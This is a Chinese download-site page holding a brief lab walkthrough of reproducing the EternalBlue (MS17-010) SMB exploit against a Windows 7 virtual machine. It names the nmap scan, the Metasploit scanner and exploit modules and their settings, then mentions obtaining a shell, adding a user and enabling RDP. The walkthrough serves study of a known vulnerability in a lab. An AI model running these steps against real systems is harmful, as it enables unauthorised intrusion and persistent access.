快盘下载:好资源、好软件、快快下载吧!

快盘排行|快盘最新

当前位置:首页软件教程电脑软件教程 → 永恒之蓝复现

永恒之蓝复现

时间:2022-10-10 13:00:46人气:作者:快盘下载我要评论

题前环境搭建;kali  win7 )

确定一下kali机所在的网段

永恒之蓝复现

使用nmap对网段进行扫描

 发现存在一主机的445端口是开着的 ;永恒之蓝利用的就是445端口的SMB服务  操作系统溢出漏洞;

利用工具msfconsole

永恒之蓝

 使用msf搜索 ms17-010 代码  (search ms17_010)

永恒之蓝

 1  auxiliary/scanner/smb/smb_ms17_010 (永恒之蓝扫描模块)   2 exploit/windows/smb/ms17_010_eternalblue  (永恒之蓝攻击模块)

先利用ms17-010扫描模块 ;use auxiliary/scanner/smb/smb_ms17_010;对靶机进行扫描

查看配置  ;show options)

永恒之蓝

 设置目标IP  (set rhosts 192.168.115.128)

永恒之蓝

 查看漏洞是否存在  答案是 是

永恒之蓝

 其次  利用攻击模块 对靶机进行攻击  ;use exploit/windows/smb/ms17_010_eternalblue;

永恒之蓝

绑定ip

永恒之蓝

再次show options 命令查看设置选项

永恒之蓝

执行攻击

永恒之蓝

得到靶机shell

永恒之蓝

 查看win7状态

永恒之蓝

 接下来可以添加用户 赋予权限

开启3389端口  进行登录

相关文章

  • Metasploit学习笔记(二)——永恒之蓝MS17-010漏洞复现

    Metasploit学习笔记(二)——永恒之蓝MS17-010漏洞复现,发现445端口打开,SMB漏洞MS17-010(永恒之蓝)正是基于445端口进行传播,因此可以加以利用。这里有各种MS17-010漏洞版本,我们根据目标系统选择编号为3的版本。Windows下IP地址为192.168.92.136。就可以看到windows7电脑中新建了这么个文件。看到WIN才说明利用成功,FAIL就是失败。使用的是nmap模块,输入命令进行扫描。开启了两台虚拟机,保证在同一网段下。两台虚拟机在同一网段,故可保持通信。...
  • 关于与“永恒之蓝”原理类似的SMBv3.0服务远程代码执行漏洞的风险提示

    【只针对于受影响的操作系统更新补丁】关于与“永恒之蓝”原理类似的SMBv3.0服务远程代码执行漏洞的风险提示,微软已经发布了针对该漏洞的补丁,可通过微软官网下载相应补丁并安装更新 ...

网友评论

快盘下载暂未开通留言功能。

关于我们| 广告联络| 联系我们| 网站帮助| 免责声明| 软件发布

Copyright 2019-2029 【快快下载吧】 版权所有 快快下载吧 | 豫ICP备10006759号公安备案:41010502004165

声明: 快快下载吧上的所有软件和资料来源于互联网,仅供学习和研究使用,请测试后自行销毁,如有侵犯你版权的,请来信指出,本站将立即改正。